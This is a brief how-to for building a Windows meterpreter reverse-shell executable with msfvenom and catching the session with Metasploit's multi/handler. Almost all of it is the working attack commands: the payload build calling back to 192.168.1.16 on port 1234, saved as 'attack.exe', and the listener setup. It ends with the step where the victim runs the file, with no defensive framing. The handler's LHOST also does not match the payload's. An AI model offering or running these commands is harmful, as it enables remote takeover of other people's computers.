msfvenom and sessions
Because many clients are behind a firewall that blocks inbound connections, we need the client to initiate the session outbound to us.
By creating a payload exe file, we can create a session to gain access to a computer.
Step 1.
Make sure Metasploit is connected to the Postgres database
db_status
service postgresql start
msf > msfdb init
- Create the attack file:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=1234 --format=exe > attack.exe
- Set Metasploit to listen on port 1234:
    use exploit/multi/handler
    set LHOST 192.168.1.1
    set LPORT 1234
    set payload windows/meterpreter/reverse_tcp
    run
- Once the file is executed on the client machine, we can connect to the session.